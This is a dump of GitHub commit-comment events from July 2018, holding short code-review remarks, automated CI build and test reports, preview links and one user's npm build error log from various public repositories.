{"id":"8018689775","type":"CommitCommentEvent","actor":{"login":"AurelioSilver"},"repo":{"name":"AurelioSilver/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29834686,"position":29,"line":22613,"path":"exported/localized/de_patch/text/game/gui.stringtable","commit_id":"0f14ad03eee5e2641ddae8bad3f06050a1cad9c7","created_at":"2018-07-25T19:57:19Z","updated_at":"2018-07-25T19:57:19Z","author_association":"OWNER","body":"Un hier ebenfalls englischer Text?"}},"created_at":"2018-07-25T19:57:19Z"}
{"id":"8018693081","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29834695,"position":null,"line":null,"path":null,"commit_id":"321ef6bb4f5033d9204a982798f9a8d88c7c5d39","created_at":"2018-07-25T19:57:57Z","updated_at":"2018-07-25T19:57:57Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/321ef6bb4f5033d9204a982798f9a8d88c7c5d39/index.html"}},"created_at":"2018-07-25T19:57:57Z"}
{"id":"8018693331","type":"CommitCommentEvent","actor":{"login":"murielsilveira"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29834696,"position":117,"line":117,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T19:58:00Z","updated_at":"2018-07-25T19:58:00Z","author_association":"NONE","body":"I think you would even be able to share the function with the `handleKeyPress`"}},"created_at":"2018-07-25T19:58:00Z"}
{"id":"8018694676","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834698,"position":13,"line":17,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"1f88b61ea6065367360d975c8fbabdfd5cd0edee","created_at":"2018-07-25T19:58:17Z","updated_at":"2018-07-25T19:58:17Z","author_association":"NONE","body":"commented imports?!? arggg"}},"created_at":"2018-07-25T19:58:17Z"}
{"id":"8018694853","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29834699,"position":null,"line":null,"path":null,"commit_id":"615a5b4898f96709ad6516003c5fe119c85ea03f","created_at":"2018-07-25T19:58:19Z","updated_at":"2018-07-25T19:58:19Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-46](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-46-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-25T19:58:19Z"}
{"id":"8018696427","type":"CommitCommentEvent","actor":{"login":"cjburkey01"},"repo":{"name":"cjburkey01/ClaimChunk"},"payload":{"comment":{"id":29834705,"position":null,"line":null,"path":null,"commit_id":"f86607e139068b9d11e8228de39287b2728fddd5","created_at":"2018-07-25T19:58:37Z","updated_at":"2018-07-25T19:58:37Z","author_association":"OWNER","body":"Also added automatic unclaiming (#27)"}},"created_at":"2018-07-25T19:58:37Z"}
{"id":"8018696588","type":"CommitCommentEvent","actor":{"login":"neikeq"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29834706,"position":5,"line":651,"path":"modules/mono/csharp_script.cpp","commit_id":"f1130f9a8a4e88c898236e722b758a142107a92a","created_at":"2018-07-25T19:58:39Z","updated_at":"2018-07-25T19:58:39Z","author_association":"MEMBER","body":"Took long enough to figure that out... :man_facepalming: "}},"created_at":"2018-07-25T19:58:39Z"}
{"id":"8018697963","type":"CommitCommentEvent","actor":{"login":"cblomart"},"repo":{"name":"cblomart/vsphere-graphite"},"payload":{"comment":{"id":29834723,"position":null,"line":null,"path":null,"commit_id":"00b3fbb83d03778155d0dbd7e4d9e4afb6c31977","created_at":"2018-07-25T19:58:57Z","updated_at":"2018-07-25T19:58:57Z","author_association":"OWNER","body":"backend.Tag == ´´ should be len(backend.Tag) == 0"}},"created_at":"2018-07-25T19:58:57Z"}
{"id":"8018698532","type":"CommitCommentEvent","actor":{"login":"dstogov"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29834726,"position":15,"line":159,"path":"UPGRADING.INTERNALS","commit_id":"f950128cd6d1eac5c143ef1cff1e8cc4281949bd","created_at":"2018-07-25T19:59:05Z","updated_at":"2018-07-25T19:59:05Z","author_association":"CONTRIBUTOR","body":"@zbenc @KalleZ \r\nOK ,\"but\" was definitely a typo.\r\nI assume, your English is better than mine, so I'll use your suggestion :)"}},"created_at":"2018-07-25T19:59:05Z"}
{"id":"8018699442","type":"CommitCommentEvent","actor":{"login":"Rnen"},"repo":{"name":"Grover-c13/Smod2"},"payload":{"comment":{"id":29834728,"position":null,"line":null,"path":null,"commit_id":"fbe191d3e6a5d79b8f09bdb3d5ecb72303439952","created_at":"2018-07-25T19:59:15Z","updated_at":"2018-07-25T19:59:15Z","author_association":"NONE","body":"Whats this? :thinking: @ShingekiNoRex "}},"created_at":"2018-07-25T19:59:15Z"}
{"id":"8018700832","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29834734,"position":null,"line":null,"path":null,"commit_id":"42d8b1b147cff3f626d0768cb44dc1a8be156873","created_at":"2018-07-25T19:59:32Z","updated_at":"2018-07-25T19:59:32Z","author_association":"NONE","body":"158270028_Issue#6422 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2946 of 2946 tests passed, 14 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n * 2 tests had: BND diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T19:59:32Z"}
{"id":"8013713500","type":"CommitCommentEvent","actor":{"login":"hmc-cs-syasunaga"},"repo":{"name":"hmc-cs-syasunaga/ML_Project"},"payload":{"comment":{"id":29822925,"position":null,"line":null,"path":null,"commit_id":"c107ebc65d1ee7866e79acc1579c522e65416923","created_at":"2018-07-25T02:00:15Z","updated_at":"2018-07-25T02:00:15Z","author_association":"OWNER","body":"Nice :) ahaha"}},"created_at":"2018-07-25T02:00:15Z"}
{"id":"8013713990","type":"CommitCommentEvent","actor":{"login":"ericywl"},"repo":{"name":"u-boot/u-boot"},"payload":{"comment":{"id":29822930,"position":null,"line":null,"path":null,"commit_id":"78a88f7930becb78afef09c1237a8e4edc1b01e1","created_at":"2018-07-25T02:00:24Z","updated_at":"2018-07-25T02:00:24Z","author_association":"NONE","body":"I think this commit made it so that `make clean` shows error. Can someone confirm this?"}},"created_at":"2018-07-25T02:00:24Z"}
{"id":"8013719342","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29822941,"position":17,"line":101,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T02:02:19Z","updated_at":"2018-07-25T02:02:19Z","author_association":"OWNER","body":"> The abstract tiles then replaced by the corresponding real image tiles, fetched from the Satellite layer of the Mapbox Maps API. At this point, each sample consisted of a photographic image paired with a mask image. \r\n\r\n\r\nThe abstract tiles were then replaced by the corresponding real image tiles, fetched from the Satellite layer of the Mapbox Maps API. At this point, each object detection sample consisted of a photographic image paired with its corresponding JSON image attribute for object detection, while each semantic segmentation sample consisted of a photographic image paired with a mask image."}},"created_at":"2018-07-25T02:02:19Z"}
{"id":"8013719525","type":"CommitCommentEvent","actor":{"login":"bennlich"},"repo":{"name":"ether/etherpad-lite"},"payload":{"comment":{"id":29822942,"position":5,"line":5,"path":"bin/repairPad.js","commit_id":"ab607d31375b1f8ba28b88f1cb4406f7fb57738c","created_at":"2018-07-25T02:02:23Z","updated_at":"2018-07-25T02:02:23Z","author_association":"NONE","body":"Why?"}},"created_at":"2018-07-25T02:02:23Z"}
{"id":"8013721681","type":"CommitCommentEvent","actor":{"login":"munjung"},"repo":{"name":"munjung/todolist"},"payload":{"comment":{"id":29822946,"position":null,"line":null,"path":null,"commit_id":"33f2d133247830c634c1c6eefe5ddad11ff93c26","created_at":"2018-07-25T02:03:12Z","updated_at":"2018-07-25T02:03:12Z","author_association":"OWNER","body":"todolist code"}},"created_at":"2018-07-25T02:03:12Z"}
{"id":"8013722103","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29822947,"position":null,"line":null,"path":null,"commit_id":"1be0e2cd942342e15cf91a3fbb1a2cdb5b30b7fe","created_at":"2018-07-25T02:03:21Z","updated_at":"2018-07-25T02:03:21Z","author_association":"MEMBER","body":"#1034 #1145 #1149"}},"created_at":"2018-07-25T02:03:21Z"}
{"id":"8013722403","type":"CommitCommentEvent","actor":{"login":"koosy79"},"repo":{"name":"koosy79/hubbahubba"},"payload":{"comment":{"id":29822948,"position":null,"line":null,"path":null,"commit_id":"0235963e4115230759885818f31cb91870bec21f","created_at":"2018-07-25T02:03:28Z","updated_at":"2018-07-25T02:03:28Z","author_association":"OWNER","body":"\t+  You should also get your employer (if you work as a programmer) or school,"}},"created_at":"2018-07-25T02:03:28Z"}
{"id":"8013724335","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29822952,"position":null,"line":null,"path":null,"commit_id":"27c02bc659f002ef986f3e16a4755166c3fc3c20","created_at":"2018-07-25T02:04:10Z","updated_at":"2018-07-25T02:04:10Z","author_association":"NONE","body":"develop (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2320 of 2320 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T02:04:10Z"}
{"id":"8013729518","type":"CommitCommentEvent","actor":{"login":"LIULi-VVET"},"repo":{"name":"actions-on-google/smart-home-dashboard"},"payload":{"comment":{"id":29822961,"position":null,"line":null,"path":null,"commit_id":"c7d84ebef38ca977b9f134ceea7c0279f8d04e9e","created_at":"2018-07-25T02:06:03Z","updated_at":"2018-07-25T02:06:03Z","author_association":"NONE","body":"The error when I executer  npm run build\r\n\r\n`\r\nERROR in src/app/device-list/device-list.component.ts(51,48): error TS2339: Property 'subscribe' does not exist on type '\"\" | Observable<any>'.\r\n  Property 'subscribe' does not exist on type '\"\"'.\r\nsrc/app/device-list/device-list.component.ts(72,46): error TS2339: Property 'subscribe' does not exist on type '\"\" | Observable<any>'.\r\n  Property 'subscribe' does not exist on type '\"\"'.\r\n\r\nnpm ERR! code ELIFECYCLE\r\nnpm ERR! errno 1\r\nnpm ERR! client@0.0.0 build: `ng build --prod && cp -r ../appengine/* ../webapp/`\r\nnpm ERR! Exit status 1\r\nnpm ERR!\r\nnpm ERR! Failed at the client@0.0.0 build script.\r\nnpm ERR! This is probably not a problem with npm. There is likely additional logging output above.\r\n\r\nnpm ERR! A complete log of this run can be found in:\r\nnpm ERR!     C:\\Users\\Admin\\AppData\\Roaming\\npm-cache\\_logs\\2018-07-25T01_57_12_320Z-debug.log\r\n`\r\n\r\n\r\nThis is debug-log\r\n`\r\n0 info it worked if it ends with ok\r\n1 verbose cli [ 'E:\\\\Program Files\\\\nodejs\\\\node.exe',\r\n1 verbose cli   'E:\\\\Program Files\\\\nodejs\\\\node_modules\\\\npm\\\\bin\\\\npm-cli.js',\r\n1 verbose cli   'run',\r\n1 verbose cli   'build' ]\r\n2 info using npm@5.6.0\r\n3 info using node@v8.11.3\r\n4 verbose run-script [ 'prebuild', 'build', 'postbuild' ]\r\n5 info lifecycle client@0.0.0~prebuild: client@0.0.0\r\n6 info lifecycle client@0.0.0~build: client@0.0.0\r\n7 verbose lifecycle client@0.0.0~build: unsafe-perm in lifecycle true\r\n8 verbose lifecycle client@0.0.0~build: PATH: E:\\Program Files\\nodejs\\node_modules\\npm\\node_modules\\npm-lifecycle\\node-gyp-bin;F:\\Project\\gooles\\smart-home-dashboard-2536ae5c12635a1ec12401a4f0d75a7d1c250aa4\\src\\main\\ngapp\\node_modules\\.bin;E:\\maven\\apache-maven-3.5.2\\bin;C:\\Program Files\\MySQL\\MySQL Server 5.7\\bin;C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;\"E:\\java\\jdk\\bin;E:\\java\\jdk\\jre\\bin;\";C:\\Program Files\\MySQL\\MySQL Utilities 1.6\\;C:\\Program Files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\ManagementStudio\\;C:\\Program Files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\;C:\\Program Files\\Microsoft SQL Server\\110\\Tools\\Binn\\;C:\\Program Files (x86)\\Microsoft SQL Server\\110\\DTS\\Binn\\;C:\\Program Files\\Microsoft\\Web Platform Installer\\;C:\\Program Files (x86)\\Microsoft ASP.NET\\ASP.NET Web Pages\\v1.0\\;E:\\Git\\Git\\cmd;E:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.7.5\\sbin;E:\\Program Files\\erl9.3\\bin;C:\\Program Files\\dotnet\\;C:\\Program Files\\Microsoft SQL Server\\130\\Tools\\Binn\\;C:\\WINDOWS\\System32\\OpenSSH\\;C:\\Program Files (x86)\\Git\\cmd;C:\\Program Files (x86)\\GitExtensions\\;F:\\tools\\spring-1.4.3.RELEASE\\bin;F:\\tools\\redis-windows-master\\downloads\\redis64-2.6.12.1;E:\\Program Files\\nodejs\\;C:\\Users\\Admin\\AppData\\Local\\Microsoft\\WindowsApps;C:\\Users\\Admin\\.dotnet\\tools;C:\\Users\\Admin\\AppData\\Local\\Microsoft\\WindowsApps;C:\\Users\\Admin\\AppData\\Roaming\\npm\r\n9 verbose lifecycle client@0.0.0~build: CWD: F:\\Project\\gooles\\smart-home-dashboard-2536ae5c12635a1ec12401a4f0d75a7d1c250aa4\\src\\main\\ngapp\r\n10 silly lifecycle client@0.0.0~build: Args: [ '/d /s /c',\r\n10 silly lifecycle   'ng build --prod && cp -r ../appengine/* ../webapp/' ]\r\n11 silly lifecycle client@0.0.0~build: Returned: code: 1  signal: null\r\n12 info lifecycle client@0.0.0~build: Failed to exec build script\r\n13 verbose stack Error: client@0.0.0 build: `ng build --prod && cp -r ../appengine/* ../webapp/`\r\n13 verbose stack Exit status 1\r\n13 verbose stack     at EventEmitter.<anonymous> (E:\\Program Files\\nodejs\\node_modules\\npm\\node_modules\\npm-lifecycle\\index.js:285:16)\r\n13 verbose stack     at emitTwo (events.js:126:13)\r\n13 verbose stack     at EventEmitter.emit (events.js:214:7)\r\n13 verbose stack     at ChildProcess.<anonymous> (E:\\Program Files\\nodejs\\node_modules\\npm\\node_modules\\npm-lifecycle\\lib\\spawn.js:55:14)\r\n13 verbose stack     at emitTwo (events.js:126:13)\r\n13 verbose stack     at ChildProcess.emit (events.js:214:7)\r\n13 verbose stack     at maybeClose (internal/child_process.js:925:16)\r\n13 verbose stack     at Process.ChildProcess._handle.onexit (internal/child_process.js:209:5)\r\n14 verbose pkgid client@0.0.0\r\n15 verbose cwd F:\\Project\\gooles\\smart-home-dashboard-2536ae5c12635a1ec12401a4f0d75a7d1c250aa4\\src\\main\\ngapp\r\n16 verbose Windows_NT 10.0.17134\r\n17 verbose argv \"E:\\\\Program Files\\\\nodejs\\\\node.exe\" \"E:\\\\Program Files\\\\nodejs\\\\node_modules\\\\npm\\\\bin\\\\npm-cli.js\" \"run\" \"build\"\r\n18 verbose node v8.11.3\r\n19 verbose npm  v5.6.0\r\n20 error code ELIFECYCLE\r\n21 error errno 1\r\n22 error client@0.0.0 build: `ng build --prod && cp -r ../appengine/* ../webapp/`\r\n22 error Exit status 1\r\n23 error Failed at the client@0.0.0 build script.\r\n23 error This is probably not a problem with npm. There is likely additional logging output above.\r\n24 verbose exit [ 1, true ]\r\n\r\n`"}},"created_at":"2018-07-25T02:06:03Z"}
{"id":"8013731451","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29822962,"position":17,"line":101,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T02:06:47Z","updated_at":"2018-07-25T02:06:47Z","author_association":"OWNER","body":"> The pre-processed annotations were then randomly assigned to training and testing datasets with a ratio of 4:1.\r\n\r\nThe pre-processed annotations were then randomly assigned to training and testing datasets with a ratio of 80% to 20%.\r\n\r\n"}},"created_at":"2018-07-25T02:06:47Z"}
{"id":"8013733340","type":"CommitCommentEvent","actor":{"login":"ZoranKJava"},"repo":{"name":"ZoranKJava/Java-SWING"},"payload":{"comment":{"id":29822965,"position":null,"line":null,"path":null,"commit_id":"1901954f8dc4ad6407f080646db326b2e3fa0616","created_at":"2018-07-25T02:07:28Z","updated_at":"2018-07-25T02:07:28Z","author_association":"OWNER","body":"IO"}},"created_at":"2018-07-25T02:07:28Z"}
{"id":"8013733915","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MEWconnect-landing-page"},"payload":{"comment":{"id":29822966,"position":null,"line":null,"path":null,"commit_id":"5079038d896a8be241b38a2111920af5712bc2c4","created_at":"2018-07-25T02:07:41Z","updated_at":"2018-07-25T02:07:41Z","author_association":"NONE","body":"Copy of this build can be found at https://mewc.mewbuilds.com/build/5079038d896a8be241b38a2111920af5712bc2c4/index.html"}},"created_at":"2018-07-25T02:07:41Z"}
{"id":"8013737370","type":"CommitCommentEvent","actor":{"login":"sdalbsoo"},"repo":{"name":"gnssl98/PythonPratice"},"payload":{"comment":{"id":29822971,"position":4,"line":5,"path":"sample.py","commit_id":"775697932f66fca1633bfea2f5acb95cc5fe8135","created_at":"2018-07-25T02:08:56Z","updated_at":"2018-07-25T02:08:56Z","author_association":"NONE","body":"change와 pay를 cal안으로 넣고 change와 pay를 return하는 형식으로 바꿔보도록ㅋ"}},"created_at":"2018-07-25T02:08:56Z"}
{"id":"8013739534","type":"CommitCommentEvent","actor":{"login":"sdalbsoo"},"repo":{"name":"gnssl98/PythonPratice"},"payload":{"comment":{"id":29822975,"position":38,"line":25,"path":"sample.py","commit_id":"775697932f66fca1633bfea2f5acb95cc5fe8135","created_at":"2018-07-25T02:09:42Z","updated_at":"2018-07-25T02:09:42Z","author_association":"NONE","body":"print는 __str__ 매직메소드 이용해서 바꾸고"}},"created_at":"2018-07-25T02:09:42Z"}
{"id":"8013744909","type":"CommitCommentEvent","actor":{"login":"reichley"},"repo":{"name":"Dafang-Hacks/spiflasher"},"payload":{"comment":{"id":29822988,"position":null,"line":null,"path":null,"commit_id":"f83942722415dd87027365726a62a74d06d7602f","created_at":"2018-07-25T02:11:41Z","updated_at":"2018-07-25T02:11:41Z","author_association":"NONE","body":"where do I get/find the rom.layout file? i have everything else set up but cannot flash bricked GD25Q128C because flashrom is erroring out when looking for the rom.layout"}},"created_at":"2018-07-25T02:11:41Z"}
{"id":"8013745508","type":"CommitCommentEvent","actor":{"login":"rowanhogan"},"repo":{"name":"everydayhero/children-in-need-ramble"},"payload":{"comment":{"id":29822989,"position":null,"line":null,"path":null,"commit_id":"c7009ea9367f038141ae6bea16d676f0d540d02c","created_at":"2018-07-25T02:11:55Z","updated_at":"2018-07-25T02:11:55Z","author_association":"CONTRIBUTOR","body":"<img width=\"643\" alt=\"font-example\" src=\"https://user-images.githubusercontent.com/729085/43175739-e58caaba-9003-11e8-8dda-2de31a3a02a4.png\">\r\n"}},"created_at":"2018-07-25T02:11:55Z"}
{"id":"8013747037","type":"CommitCommentEvent","actor":{"login":"abankrah"},"repo":{"name":"abankrah/Data_Science_Assignment_10.11287_pandas"},"payload":{"comment":{"id":29822994,"position":null,"line":null,"path":null,"commit_id":"cccfdd965c153e55e77bd8614a99a25a3cda3aea","created_at":"2018-07-25T02:12:27Z","updated_at":"2018-07-25T02:12:27Z","author_association":"OWNER","body":"[Assignment_10.11287.txt](https://github.com/abankrah/Data_Science_Assignment_10.11287_pandas/files/2226096/Assignment_10.11287.txt)\r\n"}},"created_at":"2018-07-25T02:12:27Z"}
{"id":"8013747095","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29822996,"position":null,"line":null,"path":null,"commit_id":"392e53a078deb7c87f1b2b611a0f4107f71013a6","created_at":"2018-07-25T02:12:29Z","updated_at":"2018-07-25T02:12:29Z","author_association":"NONE","body":"Now back to your Master"}},"created_at":"2018-07-25T02:12:29Z"}
{"id":"8013747380","type":"CommitCommentEvent","actor":{"login":"rowanhogan"},"repo":{"name":"everydayhero/children-in-need-ramble"},"payload":{"comment":{"id":29822997,"position":12,"line":38,"path":"source/components/AuthForm/styles.js","commit_id":"305d2fdf80f45e459288e0617f5a4cbc1321b13b","created_at":"2018-07-25T02:12:35Z","updated_at":"2018-07-25T02:12:35Z","author_association":"CONTRIBUTOR","body":"![step-1](https://user-images.githubusercontent.com/729085/43175754-f8fc2e18-9003-11e8-8cce-e634d86e05f3.png)\r\n"}},"created_at":"2018-07-25T02:12:35Z"}
{"id":"8013747516","type":"CommitCommentEvent","actor":{"login":"nta104"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29822998,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T02:12:39Z","updated_at":"2018-07-25T02:12:39Z","author_association":"NONE","body":"Thank. Hope it succesc\n\nVào Th 4, 25 thg 7, 2018 lúc 08:25 51play <notifications@github.com> đã\nviết:\n\n> great\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29822520>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AieVdN1nEoVjUMqpcpsZnOw1JnI1IWdUks5uJ8kZgaJpZM4VaEAl>\n> .\n>\n-- \n\nThanks & Best Regards,\n\nNGUYEN TUAN ANH\nCivil Engineer\n---\nMobile: 0963.710.491\nEmail: anhnguye2146@gmail.com\n"}},"created_at":"2018-07-25T02:12:39Z"}
{"id":"8013748734","type":"CommitCommentEvent","actor":{"login":"rowanhogan"},"repo":{"name":"everydayhero/children-in-need-ramble"},"payload":{"comment":{"id":29823001,"position":10,"line":9,"path":"source/components/CreatePageForm/styles.js","commit_id":"305d2fdf80f45e459288e0617f5a4cbc1321b13b","created_at":"2018-07-25T02:13:08Z","updated_at":"2018-07-25T02:13:08Z","author_association":"CONTRIBUTOR","body":"![step-2](https://user-images.githubusercontent.com/729085/43175768-132ba14c-9004-11e8-854f-c9ffd05613cd.png)\r\n"}},"created_at":"2018-07-25T02:13:08Z"}
{"id":"8013748769","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823002,"position":null,"line":null,"path":null,"commit_id":"6d2a66b75c3a17cfced0fbad5f4db2b534514fd6","created_at":"2018-07-25T02:13:08Z","updated_at":"2018-07-25T02:13:08Z","author_association":"NONE","body":"Master of the time "}},"created_at":"2018-07-25T02:13:08Z"}
{"id":"8013750104","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823006,"position":null,"line":null,"path":null,"commit_id":"b0393599491dbf9c5b1ed73bf2f4bd57f239363c","created_at":"2018-07-25T02:13:38Z","updated_at":"2018-07-25T02:13:38Z","author_association":"NONE","body":"Me"}},"created_at":"2018-07-25T02:13:38Z"}
{"id":"8013750852","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29823008,"position":5,"line":5,"path":"sub.html","commit_id":"4551bdc2969010032706e02939dbdd64cae20274","created_at":"2018-07-25T02:13:55Z","updated_at":"2018-07-25T02:13:55Z","author_association":"COLLABORATOR","body":":-1:  오타가 있네요?"}},"created_at":"2018-07-25T02:13:55Z"}
{"id":"8013750973","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823009,"position":null,"line":null,"path":null,"commit_id":"44865d878fe5d092c20b1f41b5114a21a0ab5eea","created_at":"2018-07-25T02:13:57Z","updated_at":"2018-07-25T02:13:57Z","author_association":"NONE","body":"Master"}},"created_at":"2018-07-25T02:13:57Z"}
{"id":"8013751794","type":"CommitCommentEvent","actor":{"login":"kenng69"},"repo":{"name":"xNicholas/modmail"},"payload":{"comment":{"id":29823014,"position":null,"line":null,"path":null,"commit_id":"a8bed3586adbf641c678b8d90f5b8c6123ad69b0","created_at":"2018-07-25T02:14:16Z","updated_at":"2018-07-25T02:14:16Z","author_association":"NONE","body":"Is that your token"}},"created_at":"2018-07-25T02:14:16Z"}
{"id":"8013752004","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823015,"position":null,"line":null,"path":null,"commit_id":"44865d878fe5d092c20b1f41b5114a21a0ab5eea","created_at":"2018-07-25T02:14:20Z","updated_at":"2018-07-25T02:14:20Z","author_association":"NONE","body":"Master again"}},"created_at":"2018-07-25T02:14:20Z"}
{"id":"8013752288","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29823016,"position":null,"line":null,"path":null,"commit_id":"be084e58412bdf2bdbf80b9782ac4314efac7358","created_at":"2018-07-25T02:14:26Z","updated_at":"2018-07-25T02:14:26Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2336 of 2336 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-25T02:14:26Z"}
{"id":"8013754518","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29823022,"position":38,"line":117,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T02:15:15Z","updated_at":"2018-07-25T02:15:15Z","author_association":"OWNER","body":"> FCNs can handle images of any size, while most alternatives require input dimensions to be hard-coded. \r\n\r\nFCNs can handle input images of variable sizes, while most alternatives require input dimensions to be of a certain size. "}},"created_at":"2018-07-25T02:15:15Z"}
{"id":"8013754779","type":"CommitCommentEvent","actor":{"login":"Tuanvnsa"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29823025,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T02:15:21Z","updated_at":"2018-07-25T02:15:21Z","author_association":"NONE","body":"Thanks "}},"created_at":"2018-07-25T02:15:21Z"}
{"id":"8013755042","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29823026,"position":null,"line":null,"path":null,"commit_id":"79e73a62b698f6628c9a708fca86b0002aef6068","created_at":"2018-07-25T02:15:25Z","updated_at":"2018-07-25T02:15:25Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1025](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1025).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1025-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T02:15:25Z"}
